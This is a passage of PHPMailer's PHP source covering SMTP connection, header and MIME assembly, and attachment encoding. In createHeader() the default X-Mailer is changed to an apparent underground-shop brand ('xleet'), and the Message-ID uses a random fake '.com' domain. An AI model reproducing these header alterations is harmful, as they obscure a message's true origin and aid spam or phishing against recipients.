            }
            //Do we need the OpenSSL extension?
            $sslext = defined('OPENSSL_ALGO_SHA1');
            if ('tls' === $secure or 'ssl' === $secure) {
                //Check for an OpenSSL constant rather than using extension_loaded, which is sometimes disabled
                if (!$sslext) {
                    throw new phpmailerException($this->lang('extension_missing').'openssl', self::STOP_CRITICAL);
                }
            }
            $host = $hostinfo[3];
            $port = $this->Port;
            $tport = (integer)$hostinfo[4];
            if ($tport > 0 and $tport < 65536) {
                $port = $tport;
            }
            if ($this->smtp->connect($prefix . $host, $port, $this->Timeout, $options)) {
                try {
                    if ($this->Helo) {
                        $hello = $this->Helo;
                    } else {
                        $hello = $this->serverHostname();
                    }
                    $this->smtp->hello($hello);
                    //Automatically enable TLS encryption if:
                    // * it's not disabled
                    // * we have openssl extension
                    // * we are not already using SSL
                    // * the server offers STARTTLS
                    if ($this->SMTPAutoTLS and $sslext and $secure != 'ssl' and $this->smtp->getServerExt('STARTTLS')) {
                        $tls = true;
                    }
                    if ($tls) {
                        if (!$this->smtp->startTLS()) {
                            throw new phpmailerException($this->lang('connect_host'));
                        }
                        // We must resend HELO after tls negotiation
                        $this->smtp->hello($hello);
                    }
                    if ($this->SMTPAuth) {
                        if (!$this->smtp->authenticate(
                            $this->Username,
                            $this->Password,
                            $this->AuthType,
                            $this->Realm,
                            $this->Workstation
                        )
                        ) {
                            throw new phpmailerException($this->lang('authenticate'));
                        }
                    }
                    return true;
                } catch (phpmailerException $exc) {
                    $lastexception = $exc;
                    $this->edebug($exc->getMessage());
                    // We must have connected, but then failed TLS or Auth, so close connection nicely
                    $this->smtp->quit();
                }
            }
        }
        // If we get here, all connection attempts have failed, so close connection hard
        $this->smtp->close();
        // As we've caught all exceptions, just report whatever the last one was
        if ($this->exceptions and !is_null($lastexception)) {
            throw $lastexception;
        }
        return false;
    }

    /**
     * Close the active SMTP session if one exists.
     * @return void
     */
    public function smtpClose()
    {
        if ($this->smtp !== null) {
            if ($this->smtp->connected()) {
                $this->smtp->quit();
                $this->smtp->close();
            }
        }
    }

    /**
     * Set the language for error messages.
     * Returns false if it cannot load the language file.
     * The default language is English.
     * @param string $langcode ISO 639-1 2-character language code (e.g. French is "fr")
     * @param string $lang_path Path to the language file directory, with trailing separator (slash)
     * @return boolean
     * @access public
     */
    public function setLanguage($langcode = 'en', $lang_path = '')
    {
        // Define full set of translatable strings in English
        $PHPMAILER_LANG = array(
            'authenticate' => 'SMTP Error: Could not authenticate.',
            'connect_host' => 'SMTP Error: Could not connect to SMTP host.',
            'data_not_accepted' => 'SMTP Error: data not accepted.',
            'empty_message' => 'Message body empty',
            'encoding' => 'Unknown encoding: ',
            'execute' => 'Could not execute: ',
            'file_access' => 'Could not access file: ',
            'file_open' => 'File Error: Could not open file: ',
            'from_failed' => 'The following From address failed: ',
            'instantiate' => 'Could not instantiate mail function.',
            'invalid_address' => 'Invalid address: ',
            'mailer_not_supported' => ' mailer is not supported.',
            'provide_address' => 'You must provide at least one recipient email address.',
            'recipients_failed' => 'SMTP Error: The following recipients failed: ',
            'signing' => 'Signing Error: ',
            'smtp_connect_failed' => 'SMTP connect() failed.',
            'smtp_error' => 'SMTP server error: ',
            'variable_set' => 'Cannot set or reset variable: ',
            'extension_missing' => 'Extension missing: '
        );
        if (empty($lang_path)) {
            // Calculate an absolute path so it can work if CWD is not here
            $lang_path = dirname(__FILE__). DIRECTORY_SEPARATOR . 'language'. DIRECTORY_SEPARATOR;
        }
        $foundlang = true;
        $lang_file = $lang_path . 'phpmailer.lang-' . $langcode . '.php';
        // There is no English translation file
        if ($langcode != 'en') {
            // Make sure language file path is readable
            if (!is_readable($lang_file)) {
                $foundlang = false;
            } else {
                // Overwrite language-specific strings.
                // This way we'll never have missing translation keys.
                $foundlang = include $lang_file;
            }
        }
        $this->language = $PHPMAILER_LANG;
        return (boolean)$foundlang; // Returns false if language not found
    }

    /**
     * Get the array of strings for the current language.
     * @return array
     */
    public function getTranslations()
    {
        return $this->language;
    }

    /**
     * Create recipient headers.
     * @access public
     * @param string $type
     * @param array $addr An array of recipient,
     * where each recipient is a 2-element indexed array with element 0 containing an address
     * and element 1 containing a name, like:
     * array(array('joe@example.com', 'Joe User'), array('zoe@example.com', 'Zoe User'))
     * @return string
     */
    public function addrAppend($type, $addr)
    {
        $addresses = array();
        foreach ($addr as $address) {
            $addresses[] = $this->addrFormat($address);
        }
        return $type . ': ' . implode(', ', $addresses) . $this->LE;
    }

    /**
     * Format an address for use in a message header.
     * @access public
     * @param array $addr A 2-element indexed array, element 0 containing an address, element 1 containing a name
     *      like array('joe@example.com', 'Joe User')
     * @return string
     */
    public function addrFormat($addr)
    {
        if (empty($addr[1])) { // No name provided
            return $this->secureHeader($addr[0]);
        } else {
            return $this->encodeHeader($this->secureHeader($addr[1]), 'phrase') . ' <' . $this->secureHeader(
                $addr[0]
            ) . '>';
        }
    }

    /**
     * Word-wrap message.
     * For use with mailers that do not automatically perform wrapping
     * and for quoted-printable encoded messages.
     * Original written by philippe.
     * @param string $message The message to wrap
     * @param integer $length The line length to wrap to
     * @param boolean $qp_mode Whether to run in Quoted-Printable mode
     * @access public
     * @return string
     */
    public function wrapText($message, $length, $qp_mode = false)
    {
        if ($qp_mode) {
            $soft_break = sprintf(' =%s', $this->LE);
        } else {
            $soft_break = $this->LE;
        }
        // If utf-8 encoding is used, we will need to make sure we don't
        // split multibyte characters when we wrap
        $is_utf8 = (strtolower($this->CharSet) == 'utf-8');
        $lelen = strlen($this->LE);
        $crlflen = strlen(self::CRLF);

        $message = $this->fixEOL($message);
        //Remove a trailing line break
        if (substr($message, -$lelen) == $this->LE) {
            $message = substr($message, 0, -$lelen);
        }

        //Split message into lines
        $lines = explode($this->LE, $message);
        //Message will be rebuilt in here
        $message = '';
        foreach ($lines as $line) {
            $words = explode(' ', $line);
            $buf = '';
            $firstword = true;
            foreach ($words as $word) {
                if ($qp_mode and (strlen($word) > $length)) {
                    $space_left = $length - strlen($buf) - $crlflen;
                    if (!$firstword) {
                        if ($space_left > 20) {
                            $len = $space_left;
                            if ($is_utf8) {
                                $len = $this->utf8CharBoundary($word, $len);
                            } elseif (substr($word, $len - 1, 1) == '=') {
                                $len--;
                            } elseif (substr($word, $len - 2, 1) == '=') {
                                $len -= 2;
                            }
                            $part = substr($word, 0, $len);
                            $word = substr($word, $len);
                            $buf .= ' ' . $part;
                            $message .= $buf . sprintf('=%s', self::CRLF);
                        } else {
                            $message .= $buf . $soft_break;
                        }
                        $buf = '';
                    }
                    while (strlen($word) > 0) {
                        if ($length <= 0) {
                            break;
                        }
                        $len = $length;
                        if ($is_utf8) {
                            $len = $this->utf8CharBoundary($word, $len);
                        } elseif (substr($word, $len - 1, 1) == '=') {
                            $len--;
                        } elseif (substr($word, $len - 2, 1) == '=') {
                            $len -= 2;
                        }
                        $part = substr($word, 0, $len);
                        $word = substr($word, $len);

                        if (strlen($word) > 0) {
                            $message .= $part . sprintf('=%s', self::CRLF);
                        } else {
                            $buf = $part;
                        }
                    }
                } else {
                    $buf_o = $buf;
                    if (!$firstword) {
                        $buf .= ' ';
                    }
                    $buf .= $word;

                    if (strlen($buf) > $length and $buf_o != '') {
                        $message .= $buf_o . $soft_break;
                        $buf = $word;
                    }
                }
                $firstword = false;
            }
            $message .= $buf . self::CRLF;
        }

        return $message;
    }

    /**
     * Find the last character boundary prior to $maxLength in a utf-8
     * quoted-printable encoded string.
     * Original written by Colin Brown.
     * @access public
     * @param string $encodedText utf-8 QP text
     * @param integer $maxLength Find the last character boundary prior to this length
     * @return integer
     */
    public function utf8CharBoundary($encodedText, $maxLength)
    {
        $foundSplitPos = false;
        $lookBack = 3;
        while (!$foundSplitPos) {
            $lastChunk = substr($encodedText, $maxLength - $lookBack, $lookBack);
            $encodedCharPos = strpos($lastChunk, '=');
            if (false !== $encodedCharPos) {
                // Found start of encoded character byte within $lookBack block.
                // Check the encoded byte value (the 2 chars after the '=')
                $hex = substr($encodedText, $maxLength - $lookBack + $encodedCharPos + 1, 2);
                $dec = hexdec($hex);
                if ($dec < 128) {
                    // Single byte character.
                    // If the encoded char was found at pos 0, it will fit
                    // otherwise reduce maxLength to start of the encoded char
                    if ($encodedCharPos > 0) {
                        $maxLength = $maxLength - ($lookBack - $encodedCharPos);
                    }
                    $foundSplitPos = true;
                } elseif ($dec >= 192) {
                    // First byte of a multi byte character
                    // Reduce maxLength to split at start of character
                    $maxLength = $maxLength - ($lookBack - $encodedCharPos);
                    $foundSplitPos = true;
                } elseif ($dec < 192) {
                    // Middle byte of a multi byte character, look further back
                    $lookBack += 3;
                }
            } else {
                // No encoded character found
                $foundSplitPos = true;
            }
        }
        return $maxLength;
    }

    /**
     * Apply word wrapping to the message body.
     * Wraps the message body to the number of chars set in the WordWrap property.
     * You should only do this to plain-text bodies as wrapping HTML tags may break them.
     * This is called automatically by createBody(), so you don't need to call it yourself.
     * @access public
     * @return void
     */
    public function setWordWrap()
    {
        if ($this->WordWrap < 1) {
            return;
        }

        switch ($this->message_type) {
            case 'alt':
            case 'alt_inline':
            case 'alt_attach':
            case 'alt_inline_attach':
                $this->AltBody = $this->wrapText($this->AltBody, $this->WordWrap);
                break;
            default:
                $this->Body = $this->wrapText($this->Body, $this->WordWrap);
                break;
        }
    }

    /**
     * Assemble message headers.
     * @access public
     * @return string The assembled headers
     */
    public function createHeader()
    {
        $result = '';

        if ($this->MessageDate == '') {
            $this->MessageDate = self::rfcDate();
        }
        $result .= $this->headerLine('Date', $this->MessageDate);

        // To be created automatically by mail()
        if ($this->SingleTo) {
            if ($this->Mailer != 'mail') {
                foreach ($this->to as $toaddr) {
                    $this->SingleToArray[] = $this->addrFormat($toaddr);
                }
            }
        } else {
            if (count($this->to) > 0) {
                if ($this->Mailer != 'mail') {
                    $result .= $this->addrAppend('To', $this->to);
                }
            } elseif (count($this->cc) == 0) {
                $result .= $this->headerLine('To', 'undisclosed-recipients:;');
            }
        }

        $result .= $this->addrAppend('From', array(array(trim($this->From), $this->FromName)));

        // sendmail and mail() extract Cc from the header before sending
        if (count($this->cc) > 0) {
            $result .= $this->addrAppend('Cc', $this->cc);
        }

        // sendmail and mail() extract Bcc from the header before sending
        if ((
                $this->Mailer == 'sendmail' or $this->Mailer == 'qmail' or $this->Mailer == 'mail'
            )
            and count($this->bcc) > 0
        ) {
            $result .= $this->addrAppend('Bcc', $this->bcc);
        }

        if (count($this->ReplyTo) > 0) {
            $result .= $this->addrAppend('Reply-To', $this->ReplyTo);
        }

        // mail() sets the subject itself
        if ($this->Mailer != 'mail') {
            $result .= $this->headerLine('Subject', $this->encodeHeader($this->secureHeader($this->Subject)));
        }

        if ($this->MessageID != '') {
            $this->lastMessageID = $this->MessageID;
        } else {
            $this->lastMessageID = sprintf('<%s@%s>', $this->uniqueid, rand().'.com');
        }
        $result .= $this->headerLine('Message-ID', $this->lastMessageID);
        if (!is_null($this->Priority)) {
            $result .= $this->headerLine('X-Priority', $this->Priority);
        }
        if ($this->XMailer == '') {
            $result .= $this->headerLine(
                'X-Mailer',
                'xleet.[io] PHPMailer'
            );
        } else {
            $myXmailer = trim($this->XMailer);
            if ($myXmailer) {
                $result .= $this->headerLine('X-Mailer', $myXmailer);
            }
        }

        if ($this->ConfirmReadingTo != '') {
            $result .= $this->headerLine('Disposition-Notification-To', '<' . $this->ConfirmReadingTo . '>');
        }

        // Add custom headers
        foreach ($this->CustomHeader as $header) {
            $result .= $this->headerLine(
                trim($header[0]),
                $this->encodeHeader(trim($header[1]))
            );
        }
        if (!$this->sign_key_file) {
            $result .= $this->headerLine('MIME-Version', '1.0');
            $result .= $this->getMailMIME();
        }

        return $result;
    }

    /**
     * Get the message MIME type headers.
     * @access public
     * @return string
     */
    public function getMailMIME()
    {
        $result = '';
        $ismultipart = true;
        switch ($this->message_type) {
            case 'inline':
                $result .= $this->headerLine('Content-Type', 'multipart/related;');
                $result .= $this->textLine("\tboundary=\"" . $this->boundary[1] . '"');
                break;
            case 'attach':
            case 'inline_attach':
            case 'alt_attach':
            case 'alt_inline_attach':
                $result .= $this->headerLine('Content-Type', 'multipart/mixed;');
                $result .= $this->textLine("\tboundary=\"" . $this->boundary[1] . '"');
                break;
            case 'alt':
            case 'alt_inline':
                $result .= $this->headerLine('Content-Type', 'multipart/alternative;');
                $result .= $this->textLine("\tboundary=\"" . $this->boundary[1] . '"');
                break;
            default:
                // Catches case 'plain': and case '':
                $result .= $this->textLine('Content-Type: ' . $this->ContentType . '; charset=' . $this->CharSet);
                $ismultipart = false;
                break;
        }
        // RFC1341 part 5 says 7bit is assumed if not specified
        if ($this->Encoding != '7bit') {
            // RFC 2045 section 6.4 says multipart MIME parts may only use 7bit, 8bit or binary CTE
            if ($ismultipart) {
                if ($this->Encoding == '8bit') {
                    $result .= $this->headerLine('Content-Transfer-Encoding', '8bit');
                }
                // The only remaining alternatives are quoted-printable and base64, which are both 7bit compatible
            } else {
                $result .= $this->headerLine('Content-Transfer-Encoding', $this->Encoding);
            }
        }

        if ($this->Mailer != 'mail') {
            $result .= $this->LE;
        }

        return $result;
    }

    /**
     * Returns the whole MIME message.
     * Includes complete headers and body.
     * Only valid post preSend().
     * @see PHPMailer::preSend()
     * @access public
     * @return string
     */
    public function getSentMIMEMessage()
    {
        return $this->MIMEHeader . $this->mailHeader . self::CRLF . $this->MIMEBody;
    }

    /**
     * Assemble the message body.
     * Returns an empty string on failure.
     * @access public
     * @throws phpmailerException
     * @return string The assembled message body
     */
    public function createBody()
    {
        $body = '';
        //Create unique IDs and preset boundaries
        $this->uniqueid = md5(uniqid(time()));
        $this->boundary[1] = 'b1_' . $this->uniqueid;
        $this->boundary[2] = 'b2_' . $this->uniqueid;
        $this->boundary[3] = 'b3_' . $this->uniqueid;

        if ($this->sign_key_file) {
            $body .= $this->getMailMIME() . $this->LE;
        }

        $this->setWordWrap();

        $bodyEncoding = $this->Encoding;
        $bodyCharSet = $this->CharSet;
        //Can we do a 7-bit downgrade?
        if ($bodyEncoding == '8bit' and !$this->has8bitChars($this->Body)) {
            $bodyEncoding = '7bit';
            $bodyCharSet = 'us-ascii';
        }
        //If lines are too long, and we're not already using an encoding that will shorten them,
        //change to quoted-printable transfer encoding
        if ('base64' != $this->Encoding and self::hasLineLongerThanMax($this->Body)) {
            $this->Encoding = 'quoted-printable';
            $bodyEncoding = 'quoted-printable';
        }

        $altBodyEncoding = $this->Encoding;
        $altBodyCharSet = $this->CharSet;
        //Can we do a 7-bit downgrade?
        if ($altBodyEncoding == '8bit' and !$this->has8bitChars($this->AltBody)) {
            $altBodyEncoding = '7bit';
            $altBodyCharSet = 'us-ascii';
        }
        //If lines are too long, and we're not already using an encoding that will shorten them,
        //change to quoted-printable transfer encoding
        if ('base64' != $altBodyEncoding and self::hasLineLongerThanMax($this->AltBody)) {
            $altBodyEncoding = 'quoted-printable';
        }
        //Use this as a preamble in all multipart message types
        $mimepre = "This is a multi-part message in MIME format." . $this->LE . $this->LE;
        switch ($this->message_type) {
            case 'inline':
                $body .= $mimepre;
                $body .= $this->getBoundary($this->boundary[1], $bodyCharSet, '', $bodyEncoding);
                $body .= $this->encodeString($this->Body, $bodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->attachAll('inline', $this->boundary[1]);
                break;
            case 'attach':
                $body .= $mimepre;
                $body .= $this->getBoundary($this->boundary[1], $bodyCharSet, '', $bodyEncoding);
                $body .= $this->encodeString($this->Body, $bodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->attachAll('attachment', $this->boundary[1]);
                break;
            case 'inline_attach':
                $body .= $mimepre;
                $body .= $this->textLine('--' . $this->boundary[1]);
                $body .= $this->headerLine('Content-Type', 'multipart/related;');
                $body .= $this->textLine("\tboundary=\"" . $this->boundary[2] . '"');
                $body .= $this->LE;
                $body .= $this->getBoundary($this->boundary[2], $bodyCharSet, '', $bodyEncoding);
                $body .= $this->encodeString($this->Body, $bodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->attachAll('inline', $this->boundary[2]);
                $body .= $this->LE;
                $body .= $this->attachAll('attachment', $this->boundary[1]);
                break;
            case 'alt':
                $body .= $mimepre;
                $body .= $this->getBoundary($this->boundary[1], $altBodyCharSet, 'text/plain', $altBodyEncoding);
                $body .= $this->encodeString($this->AltBody, $altBodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->getBoundary($this->boundary[1], $bodyCharSet, 'text/html', $bodyEncoding);
                $body .= $this->encodeString($this->Body, $bodyEncoding);
                $body .= $this->LE . $this->LE;
                if (!empty($this->Ical)) {
                    $body .= $this->getBoundary($this->boundary[1], '', 'text/calendar; method=REQUEST', '');
                    $body .= $this->encodeString($this->Ical, $this->Encoding);
                    $body .= $this->LE . $this->LE;
                }
                $body .= $this->endBoundary($this->boundary[1]);
                break;
            case 'alt_inline':
                $body .= $mimepre;
                $body .= $this->getBoundary($this->boundary[1], $altBodyCharSet, 'text/plain', $altBodyEncoding);
                $body .= $this->encodeString($this->AltBody, $altBodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->textLine('--' . $this->boundary[1]);
                $body .= $this->headerLine('Content-Type', 'multipart/related;');
                $body .= $this->textLine("\tboundary=\"" . $this->boundary[2] . '"');
                $body .= $this->LE;
                $body .= $this->getBoundary($this->boundary[2], $bodyCharSet, 'text/html', $bodyEncoding);
                $body .= $this->encodeString($this->Body, $bodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->attachAll('inline', $this->boundary[2]);
                $body .= $this->LE;
                $body .= $this->endBoundary($this->boundary[1]);
                break;
            case 'alt_attach':
                $body .= $mimepre;
                $body .= $this->textLine('--' . $this->boundary[1]);
                $body .= $this->headerLine('Content-Type', 'multipart/alternative;');
                $body .= $this->textLine("\tboundary=\"" . $this->boundary[2] . '"');
                $body .= $this->LE;
                $body .= $this->getBoundary($this->boundary[2], $altBodyCharSet, 'text/plain', $altBodyEncoding);
                $body .= $this->encodeString($this->AltBody, $altBodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->getBoundary($this->boundary[2], $bodyCharSet, 'text/html', $bodyEncoding);
                $body .= $this->encodeString($this->Body, $bodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->endBoundary($this->boundary[2]);
                $body .= $this->LE;
                $body .= $this->attachAll('attachment', $this->boundary[1]);
                break;
            case 'alt_inline_attach':
                $body .= $mimepre;
                $body .= $this->textLine('--' . $this->boundary[1]);
                $body .= $this->headerLine('Content-Type', 'multipart/alternative;');
                $body .= $this->textLine("\tboundary=\"" . $this->boundary[2] . '"');
                $body .= $this->LE;
                $body .= $this->getBoundary($this->boundary[2], $altBodyCharSet, 'text/plain', $altBodyEncoding);
                $body .= $this->encodeString($this->AltBody, $altBodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->textLine('--' . $this->boundary[2]);
                $body .= $this->headerLine('Content-Type', 'multipart/related;');
                $body .= $this->textLine("\tboundary=\"" . $this->boundary[3] . '"');
                $body .= $this->LE;
                $body .= $this->getBoundary($this->boundary[3], $bodyCharSet, 'text/html', $bodyEncoding);
                $body .= $this->encodeString($this->Body, $bodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->attachAll('inline', $this->boundary[3]);
                $body .= $this->LE;
                $body .= $this->endBoundary($this->boundary[2]);
                $body .= $this->LE;
                $body .= $this->attachAll('attachment', $this->boundary[1]);
                break;
            default:
                // catch case 'plain' and case ''
                $body .= $this->encodeString($this->Body, $bodyEncoding);
                break;
        }

        if ($this->isError()) {
            $body = '';
        } elseif ($this->sign_key_file) {
            try {
                if (!defined('PKCS7_TEXT')) {
                    throw new phpmailerException($this->lang('extension_missing') . 'openssl');
                }
                // @TODO would be nice to use php://temp streams here, but need to wrap for PHP < 5.1
                $file = tempnam(sys_get_temp_dir(), 'mail');
                if (false === file_put_contents($file, $body)) {
                    throw new phpmailerException($this->lang('signing') . ' Could not write temp file');
                }
                $signed = tempnam(sys_get_temp_dir(), 'signed');
                //Workaround for PHP bug https://bugs.php.net/bug.php?id=69197
                if (empty($this->sign_extracerts_file)) {
                    $sign = @openssl_pkcs7_sign(
                        $file,
                        $signed,
                        'file://' . realpath($this->sign_cert_file),
                        array('file://' . realpath($this->sign_key_file), $this->sign_key_pass),
                        null
                    );
                } else {
                    $sign = @openssl_pkcs7_sign(
                        $file,
                        $signed,
                        'file://' . realpath($this->sign_cert_file),
                        array('file://' . realpath($this->sign_key_file), $this->sign_key_pass),
                        null,
                        PKCS7_DETACHED,
                        $this->sign_extracerts_file
                    );
                }
                if ($sign) {
                    @unlink($file);
                    $body = file_get_contents($signed);
                    @unlink($signed);
                    //The message returned by openssl contains both headers and body, so need to split them up
                    $parts = explode("\n\n", $body, 2);
                    $this->MIMEHeader .= $parts[0] . $this->LE . $this->LE;
                    $body = $parts[1];
                } else {
                    @unlink($file);
                    @unlink($signed);
                    throw new phpmailerException($this->lang('signing') . openssl_error_string());
                }
            } catch (phpmailerException $exc) {
                $body = '';
                if ($this->exceptions) {
                    throw $exc;
                }
            }
        }
        return $body;
    }

    /**
     * Return the start of a message boundary.
     * @access protected
     * @param string $boundary
     * @param string $charSet
     * @param string $contentType
     * @param string $encoding
     * @return string
     */
    protected function getBoundary($boundary, $charSet, $contentType, $encoding)
    {
        $result = '';
        if ($charSet == '') {
            $charSet = $this->CharSet;
        }
        if ($contentType == '') {
            $contentType = $this->ContentType;
        }
        if ($encoding == '') {
            $encoding = $this->Encoding;
        }
        $result .= $this->textLine('--' . $boundary);
        $result .= sprintf('Content-Type: %s; charset=%s', $contentType, $charSet);
        $result .= $this->LE;
        // RFC1341 part 5 says 7bit is assumed if not specified
        if ($encoding != '7bit') {
            $result .= $this->headerLine('Content-Transfer-Encoding', $encoding);
        }
        $result .= $this->LE;

        return $result;
    }

    /**
     * Return the end of a message boundary.
     * @access protected
     * @param string $boundary
     * @return string
     */
    protected function endBoundary($boundary)
    {
        return $this->LE . '--' . $boundary . '--' . $this->LE;
    }

    /**
     * Set the message type.
     * PHPMailer only supports some preset message types,
     * not arbitrary MIME structures.
     * @access protected
     * @return void
     */
    protected function setMessageType()
    {
        $type = array();
        if ($this->alternativeExists()) {
            $type[] = 'alt';
        }
        if ($this->inlineImageExists()) {
            $type[] = 'inline';
        }
        if ($this->attachmentExists()) {
            $type[] = 'attach';
        }
        $this->message_type = implode('_', $type);
        if ($this->message_type == '') {
            $this->message_type = 'plain';
        }
    }

    /**
     * Format a header line.
     * @access public
     * @param string $name
     * @param string $value
     * @return string
     */
    public function headerLine($name, $value)
    {
        return $name . ': ' . $value . $this->LE;
    }

    /**
     * Return a formatted mail line.
     * @access public
     * @param string $value
     * @return string
     */
    public function textLine($value)
    {
        return $value . $this->LE;
    }

    /**
     * Add an attachment from a path on the filesystem.
     * Returns false if the file could not be found or read.
     * @param string $path Path to the attachment.
     * @param string $name Overrides the attachment name.
     * @param string $encoding File encoding (see $Encoding).
     * @param string $type File extension (MIME) type.
     * @param string $disposition Disposition to use
     * @throws phpmailerException
     * @return boolean
     */
    public function addAttachment($path, $name = '', $encoding = 'base64', $type = '', $disposition = 'attachment')
    {
        try {
            if (!@is_file($path)) {
                throw new phpmailerException($this->lang('file_access') . $path, self::STOP_CONTINUE);
            }

            // If a MIME type is not specified, try to work it out from the file name
            if ($type == '') {
                $type = self::filenameToType($path);
            }

            $filename = basename($path);
            if ($name == '') {
                $name = $filename;
            }

            $this->attachment[] = array(
                0 => $path,
                1 => $filename,
                2 => $name,
                3 => $encoding,
                4 => $type,
                5 => false, // isStringAttachment
                6 => $disposition,
                7 => 0
            );

        } catch (phpmailerException $exc) {
            $this->setError($exc->getMessage());
            $this->edebug($exc->getMessage());
            if ($this->exceptions) {
                throw $exc;
            }
            return false;
        }
        return true;
    }

    /**
     * Return the array of attachments.
     * @return array
     */
    public function getAttachments()
    {
        return $this->attachment;
    }

    /**
     * Attach all file, string, and binary attachments to the message.
     * Returns an empty string on failure.
     * @access protected
     * @param string $disposition_type
     * @param string $boundary
     * @return string
     */
    protected function attachAll($disposition_type, $boundary)
    {
        // Return text of body
        $mime = array();
        $cidUniq = array();
        $incl = array();

        // Add all attachments
        foreach ($this->attachment as $attachment) {
            // Check if it is a valid disposition_filter
            if ($attachment[6] == $disposition_type) {
                // Check for string attachment
                $string = '';
                $path = '';
                $bString = $attachment[5];
                if ($bString) {
                    $string = $attachment[0];
                } else {
                    $path = $attachment[0];
                }

                $inclhash = md5(serialize($attachment));
                if (in_array($inclhash, $incl)) {
                    continue;
                }
                $incl[] = $inclhash;
                $name = $attachment[2];
                $encoding = $attachment[3];
                $type = $attachment[4];
                $disposition = $attachment[6];
                $cid = $attachment[7];
                if ($disposition == 'inline' && array_key_exists($cid, $cidUniq)) {
                    continue;
                }
                $cidUniq[$cid] = true;

                $mime[] = sprintf('--%s%s', $boundary, $this->LE);
                //Only include a filename property if we have one
                if (!empty($name)) {
                    $mime[] = sprintf(
                        'Content-Type: %s; name="%s"%s',
                        $type,
                        $this->encodeHeader($this->secureHeader($name)),
                        $this->LE
                    );
                } else {
                    $mime[] = sprintf(
                        'Content-Type: %s%s',
                        $type,
                        $this->LE
                    );
                }
                // RFC1341 part 5 says 7bit is assumed if not specified
                if ($encoding != '7bit') {
                    $mime[] = sprintf('Content-Transfer-Encoding: %s%s', $encoding, $this->LE);
                }

                if ($disposition == 'inline') {
                    $mime[] = sprintf('Content-ID: <%s>%s', $cid, $this->LE);
                }

                // If a filename contains any of these chars, it should be quoted,
                // but not otherwise: RFC2183 & RFC2045 5.1
                // Fixes a warning in IETF's msglint MIME checker
                // Allow for bypassing the Content-Disposition header totally
                if (!(empty($disposition))) {
                    $encoded_name = $this->encodeHeader($this->secureHeader($name));
                    if (preg_match('/[ \(\)<>@,;:\\"\/\[\]\?=]/', $encoded_name)) {
                        $mime[] = sprintf(
                            'Content-Disposition: %s; filename="%s"%s',
                            $disposition,
                            $encoded_name,
                            $this->LE . $this->LE
                        );
                    } else {
                        if (!empty($encoded_name)) {
                            $mime[] = sprintf(
                                'Content-Disposition: %s; filename=%s%s',
                                $disposition,
                                $encoded_name,
                                $this->LE . $this->LE
                            );
                        } else {
                            $mime[] = sprintf(
                                'Content-Disposition: %s%s',
                                $disposition,
                                $this->LE . $this->LE
                            );
                        }
                    }
                } else {
                    $mime[] = $this->LE;
                }

                // Encode as string attachment
                if ($bString) {
                    $mime[] = $this->encodeString($string, $encoding);
                    if ($this->isError()) {
                        return '';
                    }
                    $mime[] = $this->LE . $this->LE;
                } else {
                    $mime[] = $this->encodeFile($path, $encoding);
                    if ($this->isError()) {
                        return '';
                    }
                    $mime[] = $this->LE . $this->LE;
                }
            }
        }

        $mime[] = sprintf('--%s--%s', $boundary, $this->LE);

        return implode('', $mime);
    }

    /**
     * Encode a file attachment in requested format.
     * Returns an empty string on failure.
     * @param string $path The full path to the file
     * @param string $encoding The encoding to use; one of 'base64', '7bit', '8bit', 'binary', 'quoted-printable'
     * @throws phpmailerException
     * @access protected
     * @return string
     */
    protected function encodeFile($path, $encoding = 'base64')
    {
        try {
            if (!is_readable($path)) {
                throw new phpmailerException($this->lang('file_open') . $path, self::STOP_CONTINUE);
            }
            $magic_quotes = get_magic_quotes_runtime();
            if ($magic_quotes) {
                if (version_compare(PHP_VERSION, '5.3.0', '<')) {
                    set_magic_quotes_runtime(false);
                } else {
                    //Doesn't exist in PHP 5.4, but we don't need to check because
                    //get_magic_quotes_runtime always returns false in 5.4+
                    //so it will never get here
                    ini_set('magic_quotes_runtime', false);
                }
            }
            $file_buffer = file_get_contents($path);
            $file_buffer = $this->encodeString($file_buffer, $encoding);
            if ($magic_quotes) {
                if (version_compare(PHP_VERSION, '5.3.0', '<')) {
                    set_magic_quotes_runtime($magic_quotes);
                } else {
                    ini_set('magic_quotes_runtime', $magic_quotes);
                }
            }
            return $file_buffer;
        } catch (Exception $exc) {
            $this->setError($exc->getMessage());
            return '';
        }
    }

    /**
     * Encode a string in requested format.
     * Returns an empty string on failure.
     * @param string $str The text to encode
     * @param string $encoding The encoding to use; one of 'base64', '7bit', '8bit', 'binary', 'quoted-printable'
     * @access public
     * @return string
     */
    public function encodeString($str, $encoding = 'base64')
    {
        $encoded = '';
        switch (strtolower($encoding)) {
            case 'base64':
                $encoded = chunk_split(base64_encode($str), 76, $this->LE);
                break;
            case '7bit':
            case '8bit':
                $encoded = $this->fixEOL($str);
                // Make sure it ends with a line break
                if (substr($encoded, -(strlen($this->LE))) != $this->LE) {
                    $encoded .= $this->LE;
                }
                break;
            case 'binary':
                $encoded = $str;
                break;
            case 'quoted-printable':
                $encoded = $this->encodeQP($str);
                break;
            default:
                $this->setError($this->lang('encoding') . $encoding);
                break;
        }
        return $encoded;
    }

    /**
     * Encode a header string optimally.
     * Picks shortest of Q, B, quoted-printable or none.
     * @access public
     * @param string $str
     * @param string $position
     * @return string
     */
    public function encodeHeader($str, $position = 'text')
    {
        $matchcount = 0;
        switch (strtolower($position)) {
            case 'phrase':
                if (!preg_match('/[\200-\377]/', $str)) {
                    // Can't use addslashes as we don't know the value of magic_quotes_sybase
                    $encoded = addcslashes($str, "\0..\37\177\\\"");
                    if (($str == $encoded) && !preg_match('/[^A-Za-z0-9!#$%&\'*+\/=?^_`{|}~ -]/', $str)) {
                        return ($encoded);
                    } else {
                        return ("\"$encoded\"");
                    }
                }
                $matchcount = preg_match_all('/[^\040\041\043-\133\135-\176]/', $str, $matches);
                break;
            /** @noinspection PhpMissingBreakStatementInspection */
            case 'comment':
                $matchcount = preg_match_all('/[()"]/', $str, $matches);
                // Intentional fall-through
            case 'text':
            default:
                $matchcount += preg_match_all('/[\000-\010\013\014\016-\037\177-\377]/', $str, $matches);
                break;
        }

        //There are no chars that need encoding
